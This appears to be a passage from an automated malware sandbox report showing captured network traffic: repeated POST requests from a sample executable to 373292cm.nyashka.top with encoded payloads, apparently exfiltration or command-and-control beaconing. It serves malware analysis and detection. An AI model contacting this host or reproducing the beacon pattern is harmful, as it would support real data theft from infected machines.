                                                                    Data Ascii: ZQ\VQDQZ[_ZQYRXRW\][WPSUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,35?7*4]?>%^?[4'V# R<'] ;.&F$.Y/1
                                                                    Aug 21, 2024 10:03:28.855467081 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:28.995536089 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.74974980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:29.134613037 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:29.490113974 CEST2544OUTData Raw: 5f 5c 5c 5f 54 48 51 59 5b 5f 5a 51 59 54 58 55 57 58 5d 59 57 51 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\\_THQY[_ZQYTXUWX]YWQSXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.,#/!-#=Y>.(##?# +*9\#0&.>&F$.Y/)
                                                                    Aug 21, 2024 10:03:29.839284897 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:29.975137949 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.74975080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:30.195215940 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:30.552957058 CEST2544OUTData Raw: 5f 54 5c 5e 54 44 54 5d 5b 5f 5a 51 59 52 58 51 57 5f 5d 59 57 5c 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\^TDT][_ZQYRXQW_]YW\STYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-;3#@"7#V*>'>>><='Y //S 1(P*)4!,&F$.Y/1
                                                                    Aug 21, 2024 10:03:30.875128031 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:31.074687958 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.74975180.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:31.285007954 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:31.631076097 CEST2544OUTData Raw: 5f 55 59 55 54 41 54 50 5b 5f 5a 51 59 5e 58 52 57 5d 5d 5d 57 59 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _UYUTATP[_ZQY^XRW]]]WYS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.83D#>7 3=X>\<._+[(7+W78*9<7#>/.&F$.Y/
                                                                    Aug 21, 2024 10:03:31.961420059 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:32.165831089 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.76538180.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:32.329693079 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:32.679223061 CEST2544OUTData Raw: 5f 51 59 52 54 47 54 5b 5b 5f 5a 51 59 51 58 56 57 59 5d 5c 57 58 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYRTGT[[_ZQYQXVWY]\WXS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.,3?6<^ 3%[*-Y?Z+. "?,4"$Q((70!_,>&F$.Y/=
                                                                    Aug 21, 2024 10:03:33.003505945 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:33.133506060 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.76538280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:33.476500988 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.76538380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:33.686141968 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:34.038362980 CEST1868OUTData Raw: 5a 52 5c 53 51 47 54 58 5b 5f 5a 51 59 52 58 5e 57 5b 5d 59 57 50 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZR\SQGTX[_ZQYRX^W[]YWPSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/0?5="0=>-Y?=*+=?#?0#2??9#]79_;>&F$.Y/1
                                                                    Aug 21, 2024 10:03:34.379303932 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:34.517278910 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 1e 28 35 29 03 31 3b 05 08 27 0a 26 55 2a 13 0d 1d 3e 2e 2d 5f 33 06 08 04 27 2e 2c 1c 24 5d 3d 58 28 3e 00 57 31 2c 23 13 2e 24 2b 5d 0c 13 22 59 23 04 22 59 25 3f 2c 5d 2a 38 2b 18 21 02 08 10 29 2a 2d 54 3e 2f 30 5e 3f 3a 3b 59 28 04 35 0c 2c 5e 22 02 39 1e 25 0c 20 14 2b 52 0d 11 24 56 3c 2d 2e 0d 2a 07 3b 59 21 01 3b 1d 33 3e 22 57 26 21 22 55 27 07 38 5a 25 22 36 09 25 21 0f 55 31 28 36 58 27 3c 22 0f 36 22 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &(5)1;'&U*>.-_3'.,$]=X(>W1,#.$+]"Y#"Y%?,]*8+!)*-T>/0^?:;Y(5,^"9% +R$V<-.*;Y!;3>"W&!"U'8Z%"6%!U1(6X'<"6"#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.76538480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:33.836772919 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:34.200556040 CEST2544OUTData Raw: 5f 5d 5c 55 54 47 54 5b 5b 5f 5a 51 59 56 58 57 57 5f 5d 52 57 51 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]\UTGT[[_ZQYVXWW_]RWQSYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.X,#'A6>$_#[>=(_?:(>?\",$ 20S+_+"#68&F$.Y/!
                                                                    Aug 21, 2024 10:03:34.513344049 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:34.649585009 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.76538580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:34.864108086 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:35.211775064 CEST2544OUTData Raw: 5f 5d 5c 56 51 42 54 5d 5b 5f 5a 51 59 5f 58 5f 57 59 5d 5c 57 59 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]\VQBT][_ZQY_X_WY]\WYSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.].#5['# )>((9\<='[ ,R7'(;\# 68&F$.Y/
                                                                    Aug 21, 2024 10:03:35.547939062 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:35.747035980 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.76538680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:36.471767902 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:36.818242073 CEST2544OUTData Raw: 5a 56 59 54 54 43 54 5e 5b 5f 5a 51 59 5f 58 5e 57 51 5d 5d 57 59 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZVYTTCT^[_ZQY_X^WQ]]WYS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,8!=##=)>0X(>5)-+X 0!!,S<4#01/>&F$.Y/
                                                                    Aug 21, 2024 10:03:37.130477905 CEST1236OUTData Raw: 5a 56 59 54 54 43 54 5e 5b 5f 5a 51 59 5f 58 5e 57 51 5d 5d 57 59 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZVYTTCT^[_ZQY_X^WQ]]WYS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,8!=##=)>0X(>5)-+X 0!!,S<4#01/>&F$.Y/
                                                                    Aug 21, 2024 10:03:37.645534992 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:37.645909071 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:37.646688938 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:37.650804043 CEST1308OUTData Raw: 3b 59 2c 11 37 0f 2f 20 00 3a 3b 14 39 09 08 06 2c 5d 5a 42 3f 5e 01 26 29 00 02 1c 31 0a 0c 3b 0b 0a 2c 35 3f 00 30 04 34 0f 05 1b 08 56 03 35 2a 24 2d 3f 3e 02 58 12 0b 56 1b 3f 2b 3c 5b 0b 32 13 26 5f 33 5e 59 1f 09 3f 50 14 3a 37 0c 22 34 3d
                                                                    Data Ascii: ;Y,7/ :;9,]ZB?^&)1;,5?04V5*$-?>XV?+<[2&_3^Y?P:7"4=1'8<Z1+81;9<\0/::4_>W&?'!* 0%,>4V.(S2[-5.3< /9_.89.9 -R=\;:&3E3V5=)??%PC#6$3?7+1:9#<9;10[U<,"#>T;=W&,_4=1
                                                                    Aug 21, 2024 10:03:38.052490950 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.76538780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:38.251748085 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:38.602871895 CEST2544OUTData Raw: 5f 56 5c 51 54 42 54 5b 5b 5f 5a 51 59 50 58 57 57 5c 5d 53 57 5e 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _V\QTBT[[_ZQYPXWW\]SW^SZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.^. 0#.<Y %*=??X:+=;X 4"/<_< V!Y,&F$.Y/
                                                                    Aug 21, 2024 10:03:38.925242901 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:39.369179010 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:03:39.369411945 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.76538880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:39.528065920 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:39.880758047 CEST1844OUTData Raw: 5f 54 5c 55 54 45 54 5f 5b 5f 5a 51 59 52 58 52 57 5e 5d 5f 57 5b 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\UTET_[_ZQYRXRW^]_W[S]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.8$" X 6='+)<>#Y <#7,<Y4>;&F$.Y/1
                                                                    Aug 21, 2024 10:03:40.210724115 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:40.408946991 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 11 3d 36 21 05 32 3b 30 54 24 55 32 1d 29 3d 3f 1d 2b 2e 2d 14 25 28 0f 17 32 3d 3c 13 30 15 32 02 2b 2e 22 57 32 3c 24 01 39 34 2b 5d 0c 13 22 1b 34 3a 32 5c 31 3c 01 05 2a 38 2c 05 22 12 03 02 2b 14 36 0d 3c 3f 3c 5f 28 17 37 10 28 04 21 0a 3b 01 3d 15 2d 09 2e 54 23 04 2b 52 0d 11 27 0d 28 2e 21 10 29 3e 19 5d 22 01 27 59 33 2e 32 13 32 54 32 57 33 39 3f 03 25 21 39 1d 30 0f 22 0f 24 38 31 03 26 06 22 0c 35 08 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &=6!2;0T$U2)=?+.-%(2=<02+."W2<$94+]"4:2\1<*8,"+6<?<_(7(!;=-.T#+R'(.!)>]"'Y3.22T2W39?%!90"$81&"5#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.76538980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:39.531660080 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:39.880654097 CEST2544OUTData Raw: 5f 53 5c 5f 54 40 51 59 5b 5f 5a 51 59 52 58 5f 57 50 5d 5e 57 58 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _S\_T@QY[_ZQYRX_WP]^WXSXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/35;40\=+="+.$#Z#V7V*)(7#";.&F$.Y/1
                                                                    Aug 21, 2024 10:03:40.213488102 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:40.412091970 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.76539080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:40.602412939 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
